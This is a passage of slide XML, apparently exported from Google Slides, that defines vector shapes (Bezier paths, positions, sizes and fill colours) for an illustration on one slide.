                  <a:cubicBezTo>
                    <a:pt x="5406" y="290"/>
                    <a:pt x="5240" y="324"/>
                    <a:pt x="5061" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4507" y="324"/>
                    <a:pt x="3822" y="1"/>
                    <a:pt x="3249" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3097" y="1"/>
                    <a:pt x="2954" y="23"/>
                    <a:pt x="2822" y="81"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2739" y="81"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2608" y="23"/>
                    <a:pt x="2463" y="1"/>
                    <a:pt x="2311" y="1"/>
                  </a:cubicBez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29" name="Google Shape;96;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2164093" y="2364940"/>
              <a:ext cx="202116" cy="38258"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4966" h="940" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="259"/>
                    <a:pt x="1409" y="931"/>
                    <a:pt x="2147" y="931"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2258" y="931"/>
                    <a:pt x="2362" y="916"/>
                    <a:pt x="2454" y="882"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2584" y="922"/>
                    <a:pt x="2712" y="939"/>
                    <a:pt x="2838" y="939"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3651" y="939"/>
                    <a:pt x="4389" y="211"/>
                    <a:pt x="4966" y="36"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4966" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2454" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ED906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0" name="Google Shape;97;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2202880" y="2371737"/>
              <a:ext cx="114408" cy="12658"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2811" h="311" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2810" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2810" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2632" y="84"/>
                    <a:pt x="2370" y="131"/>
                    <a:pt x="2096" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1917" y="179"/>
                    <a:pt x="1715" y="262"/>
                    <a:pt x="1524" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1322" y="262"/>
                    <a:pt x="1096" y="167"/>
                    <a:pt x="893" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="560" y="119"/>
                    <a:pt x="251" y="72"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="12"/>
                    <a:pt x="746" y="310"/>
                    <a:pt x="1482" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1496" y="310"/>
                    <a:pt x="1510" y="310"/>
                    <a:pt x="1524" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2274" y="310"/>
                    <a:pt x="2810" y="0"/>
                    <a:pt x="2810" y="0"/>
                  </a:cubicBez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1" name="Google Shape;98;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2625914" y="3196473"/>
              <a:ext cx="88238" cy="491900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2168" h="12086" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="453" y="7013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072" y="7299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1370" y="12085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1644" y="6406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="6299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="6299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1191" y="6478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1"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2" name="Google Shape;99;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1769181" y="3196473"/>
              <a:ext cx="114408" cy="573300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2811" h="14086" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="386" y="6230"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="6230"/>
                    <a:pt x="369" y="6240"/>
                    <a:pt x="369" y="6240"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="410" y="6247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410" y="6247"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="401" y="6234"/>
                    <a:pt x="393" y="6230"/>
                    <a:pt x="386" y="6230"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2810" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1620" y="6478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410" y="6247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410" y="6247"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="447" y="6299"/>
                    <a:pt x="498" y="6496"/>
                    <a:pt x="512" y="7168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="608" y="9847"/>
                    <a:pt x="0" y="14086"/>
                    <a:pt x="0" y="14086"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1131" y="7299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155" y="7299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2810" y="1"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="C1C1C1"/>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3" name="Google Shape;100;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2563888" y="2040768"/>
              <a:ext cx="37851" cy="96947"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="930" h="2382" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="274" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="2382"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2382"/>
                    <a:pt x="870" y="1655"/>
                    <a:pt x="906" y="1286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="929" y="917"/>
                    <a:pt x="274" y="0"/>
                    <a:pt x="274" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFAF99"/>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4" name="Google Shape;101;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1301539" y="4483026"/>
              <a:ext cx="1885590" cy="50427"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="46329" h="1239" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="144" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="1"/>
                    <a:pt x="1" y="84"/>
                    <a:pt x="1" y="155"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="1096"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1167"/>
                    <a:pt x="72" y="1239"/>
                    <a:pt x="144" y="1239"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46173" y="1239"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="46257" y="1239"/>
                    <a:pt x="46328" y="1167"/>
                    <a:pt x="46328" y="1096"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46328" y="155"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="46328" y="84"/>
                    <a:pt x="46257" y="1"/>
                    <a:pt x="46173" y="1"/>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5" name="Google Shape;102;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2077361"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6" name="Google Shape;103;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2366168" y="2112969"/>
              <a:ext cx="72731" cy="100814"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1787" h="2477" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="894" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="406" y="0"/>
                    <a:pt x="1" y="548"/>
                    <a:pt x="1" y="1239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1917"/>
                    <a:pt x="406" y="2477"/>
                    <a:pt x="894" y="2477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1382" y="2477"/>
                    <a:pt x="1787" y="1917"/>
                    <a:pt x="1787" y="1239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1787" y="572"/>
                    <a:pt x="1382" y="12"/>
                    <a:pt x="894" y="0"/>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7" name="Google Shape;104;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1929742" y="2140726"/>
              <a:ext cx="654537" cy="389499"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="16082" h="9570" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="65" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1"/>
                    <a:pt x="89" y="603"/>
                    <a:pt x="615" y="2759"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1782" y="7605"/>
                    <a:pt x="7259" y="9570"/>
                    <a:pt x="8224" y="9570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9188" y="9570"/>
                    <a:pt x="10462" y="8724"/>
                    <a:pt x="13141" y="6557"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15820" y="4379"/>
                    <a:pt x="16082" y="735"/>
                    <a:pt x="16082" y="735"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16082" y="735"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15394" y="1695"/>
                    <a:pt x="13549" y="3294"/>
                    <a:pt x="11894" y="3294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11372" y="3294"/>
                    <a:pt x="10869" y="3135"/>
                    <a:pt x="10426" y="2747"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9496" y="1926"/>
                    <a:pt x="9035" y="1527"/>
                    <a:pt x="8522" y="1527"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8016" y="1527"/>
                    <a:pt x="7459" y="1914"/>
                    <a:pt x="6354" y="2664"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5759" y="3071"/>
                    <a:pt x="5130" y="3239"/>
                    <a:pt x="4511" y="3239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2812" y="3239"/>
                    <a:pt x="1179" y="1982"/>
                    <a:pt x="473" y="961"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="473" y="961"/>
                    <a:pt x="146" y="1"/>
                    <a:pt x="65" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00000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8" name="Google Shape;105;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2004183" y="2745807"/>
              <a:ext cx="51404" cy="251567"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1263" h="6181" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="2025"/>
                    <a:pt x="775" y="4097"/>
                    <a:pt x="1263" y="6180"/>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39" name="Google Shape;106;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2428683" y="2748249"/>
              <a:ext cx="83394" cy="379446"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2049" h="9323" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2049" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1799" y="1489"/>
                    <a:pt x="775" y="2727"/>
                    <a:pt x="418" y="4251"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="6037"/>
                    <a:pt x="287" y="7561"/>
                    <a:pt x="656" y="9323"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="3875"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0" name="Google Shape;107;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2445166" y="3074374"/>
              <a:ext cx="10704" cy="53317"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="263" h="1310" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="263" y="1310"/>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1" name="Google Shape;108;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1893723" y="1701334"/>
              <a:ext cx="707040" cy="741188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="17372" h="18211" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="9314" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8798" y="1"/>
                    <a:pt x="524" y="4459"/>
                    <a:pt x="524" y="4459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="524" y="4459"/>
                    <a:pt x="0" y="11793"/>
                    <a:pt x="96" y="12662"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="13520"/>
                    <a:pt x="941" y="15936"/>
                    <a:pt x="941" y="15936"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4287" y="17949"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3441" y="15603"/>
                    <a:pt x="2441" y="7376"/>
                    <a:pt x="6144" y="6102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7364" y="5677"/>
                    <a:pt x="8416" y="5507"/>
                    <a:pt x="9321" y="5507"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11179" y="5507"/>
                    <a:pt x="12415" y="6223"/>
                    <a:pt x="13216" y="6912"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14395" y="7924"/>
                    <a:pt x="13883" y="15817"/>
                    <a:pt x="12919" y="18211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16955" y="15044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17372" y="3887"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17372" y="3887"/>
                    <a:pt x="9537" y="185"/>
                    <a:pt x="9335" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9331" y="3"/>
                    <a:pt x="9324" y="1"/>
                    <a:pt x="9314" y="1"/>
                  </a:cubicBez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2" name="Google Shape;109;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1790996" y="1390959"/>
              <a:ext cx="944973" cy="1381073"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="23218" h="33933" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="11514" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10180" y="0"/>
                    <a:pt x="1608" y="5453"/>
                    <a:pt x="786" y="12252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="19050"/>
                    <a:pt x="1786" y="27492"/>
                    <a:pt x="4763" y="33933"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5775" y="33933"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5775" y="33933"/>
                    <a:pt x="4024" y="21324"/>
                    <a:pt x="4477" y="16240"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4882" y="11525"/>
                    <a:pt x="9085" y="10704"/>
                    <a:pt x="11871" y="10704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14657" y="10704"/>
                    <a:pt x="17764" y="11525"/>
                    <a:pt x="18312" y="15538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18883" y="19741"/>
                    <a:pt x="16943" y="33576"/>
                    <a:pt x="16943" y="33576"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18967" y="33933"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21277" y="27396"/>
                    <a:pt x="23217" y="17752"/>
                    <a:pt x="22205" y="12156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21134" y="6263"/>
                    <a:pt x="12859" y="0"/>
                    <a:pt x="11514" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="575756"/>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3" name="Google Shape;110;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1301539" y="3226997"/>
              <a:ext cx="1885590" cy="1256083"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="46329" h="30862" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="441" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="1"/>
                    <a:pt x="1" y="191"/>
                    <a:pt x="1" y="441"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="30421"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="30671"/>
                    <a:pt x="203" y="30862"/>
                    <a:pt x="441" y="30862"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45876" y="30862"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="46138" y="30862"/>
                    <a:pt x="46328" y="30671"/>
                    <a:pt x="46328" y="30421"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46328" y="441"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="46328" y="191"/>
                    <a:pt x="46138" y="1"/>
                    <a:pt x="45876" y="1"/>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4" name="Google Shape;111;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1092220" y="3508638"/>
              <a:ext cx="330525" cy="521367"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8121" h="12810" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3652" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2300" y="0"/>
                    <a:pt x="1546" y="755"/>
                    <a:pt x="2001" y="2010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1882" y="2427"/>
                    <a:pt x="286" y="3380"/>
                    <a:pt x="1310" y="4404"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1191" y="4701"/>
                    <a:pt x="0" y="5225"/>
                    <a:pt x="893" y="7035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="8095"/>
                    <a:pt x="691" y="8976"/>
                    <a:pt x="1691" y="9749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="10071"/>
                    <a:pt x="2501" y="10952"/>
                    <a:pt x="3679" y="11952"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4287" y="12476"/>
                    <a:pt x="5144" y="12809"/>
                    <a:pt x="5144" y="12809"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5120" y="8785"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6489" y="8726"/>
                    <a:pt x="7299" y="8404"/>
                    <a:pt x="7501" y="7630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7501" y="6928"/>
                    <a:pt x="5703" y="6975"/>
                    <a:pt x="5739" y="6904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6192" y="6785"/>
                    <a:pt x="7561" y="6975"/>
                    <a:pt x="7906" y="5785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8120" y="4916"/>
                    <a:pt x="6037" y="4749"/>
                    <a:pt x="5263" y="4701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5261" y="4696"/>
                    <a:pt x="5270" y="4694"/>
                    <a:pt x="5290" y="4694"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5391" y="4694"/>
                    <a:pt x="5768" y="4752"/>
                    <a:pt x="6197" y="4752"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6667" y="4752"/>
                    <a:pt x="7199" y="4683"/>
                    <a:pt x="7501" y="4392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7918" y="3999"/>
                    <a:pt x="7906" y="3451"/>
                    <a:pt x="7608" y="3106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7311" y="2772"/>
                    <a:pt x="5322" y="2332"/>
                    <a:pt x="5287" y="2272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5600" y="2272"/>
                    <a:pt x="5914" y="2323"/>
                    <a:pt x="6163" y="2323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6367" y="2323"/>
                    <a:pt x="6528" y="2289"/>
                    <a:pt x="6608" y="2165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7251" y="1237"/>
                    <a:pt x="6037" y="498"/>
                    <a:pt x="5061" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4546" y="73"/>
                    <a:pt x="4071" y="0"/>
                    <a:pt x="3652" y="0"/>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5" name="Google Shape;112;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1215296" y="3585520"/>
              <a:ext cx="92104" cy="15629"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2263" h="384" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="146" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="1"/>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2263" y="383"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1737" y="33"/>
                    <a:pt x="557" y="1"/>
                    <a:pt x="146"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6" name="Google Shape;113;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1192993" y="3686821"/>
              <a:ext cx="138665" cy="15100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3407" h="371" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="225" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="0"/>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3406" y="371"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2582" y="32"/>
                    <a:pt x="844" y="0"/>
                    <a:pt x="225"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7" name="Google Shape;114;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1178951" y="3781610"/>
              <a:ext cx="146886" cy="8018"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3609" h="197" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1526" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="994" y="0"/>
                    <a:pt x="447" y="47"/>
                    <a:pt x="1" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3608" y="197"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3608" y="189"/>
                    <a:pt x="2598" y="0"/>
                    <a:pt x="1526" y="0"/>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8" name="Google Shape;115;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1164910" y="3863742"/>
              <a:ext cx="135734" cy="15873"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3335" h="390" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1"/>
